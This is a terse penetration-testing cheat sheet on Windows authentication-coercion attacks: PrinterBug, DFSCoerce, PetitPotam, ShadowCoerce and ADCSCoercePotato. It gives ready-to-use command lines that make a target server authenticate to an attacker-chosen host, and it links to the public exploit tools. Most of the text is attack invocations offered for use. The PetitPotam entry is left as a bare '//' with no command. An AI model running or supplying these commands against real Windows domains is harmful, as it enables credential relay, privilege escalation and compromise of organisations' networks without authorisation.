Coercing

Printerbug.py

Triggers RPC call using SpoolService bug.

[[domain/]username[:password]@]<targetName> attackerhost
python3 printerbug.py CORP.local/[email protected] 192.168.102.1

DFS Coerce (MS-DFSNM)

MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot

python3 dfscoerce.py -u Joe -d CORP.local 192.168.101.1 192.168.102.1

PetitPotam (MS-EFSRPC)

Coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw

//

ShadowCoerce (MS-FSRVP)

MS-FSRVP coercion abuse

python3 shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET

ADCSCoercePotato

Yet another technique for coercing machine authentication but specific for ADCS server

GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.GitHub

Links

• https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

• https://github.com/cube0x0/SharpSystemTriggers

• https://github.com/Wh04m1001/DFSCoerce/blob/main/dfscoerce.py

• https://github.com/topotam/PetitPotam/blob/main/PetitPotam.py

• https://github.com/ShutdownRepo/ShadowCoerce/blob/main/shadowcoerce.py

• https://github.com/decoder-it/ADCSCoercePotato